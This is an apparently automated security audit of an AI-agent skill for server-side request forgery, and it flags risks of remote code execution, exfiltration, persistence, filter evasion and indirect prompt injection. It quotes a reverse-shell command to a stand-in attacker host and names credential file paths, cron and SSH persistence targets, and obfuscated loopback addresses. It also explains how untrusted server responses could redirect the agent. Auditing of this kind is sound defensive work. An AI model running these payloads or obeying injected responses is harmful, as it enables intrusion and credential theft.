ssrf-server-side-request-forgery

Warn

Audited by Gen Agent Trust Hub on Sep 15, 2026

Risk Level: MEDIUMREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONPERSISTENCEOBFUSCATIONINDIRECT_PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: Found in SCENARIOS.md and URL_PARSER_TRICKS.md. The skill provides specific payloads and methodologies for gaining shell access through SSRF exploitation. For example, it details using the gopher protocol to inject Redis commands that execute a reverse shell (bash -i >& /dev/tcp/attacker.com/4444 0>&1).
  • [DATA_EXFILTRATION]: Found in SKILL.md and URL_PARSER_TRICKS.md. The skill details techniques for exfiltrating sensitive information from the local file system (e.g., /etc/passwd, /etc/shadow, /proc/self/environ) and internal metadata services. It provides a complete catalog of endpoints for harvesting credentials from AWS, GCP, Azure, and Kubernetes environments.
  • [PERSISTENCE]: Found in SKILL.md and SCENARIOS.md. The playbook describes methods for maintaining unauthorized access by abusing SSRF to write to system configuration files. Evidence includes instructions for writing to crontab directories (/var/spool/cron/root) and SSH authorized_keys files.
  • [OBFUSCATION]: Found in URL_PARSER_TRICKS.md and SCENARIOS.md. The skill provides extensive documentation on bypassing security filters using URL parser confusion and character obfuscation. This includes the use of decimal/octal/hex IP formats and Unicode variations like fullwidth and enclosed characters (①②⑦.⓪.⓪.①, 127.0.0.1, ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ) to evade string-based pattern matching.
  • [INDIRECT_PROMPT_INJECTION]: The skill defines multiple ingestion points for untrusted data (e.g., url, callback, src parameters in SKILL.md) and instructs the agent to process the resulting server responses. The lack of sanitization guidance or boundary markers creates a vulnerability where a malicious target server could influence the agent's subsequent actions.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Sep 15, 2026, 02:14 PM
Security Audit — agent-trust-hub — ssrf-server-side-request-forgery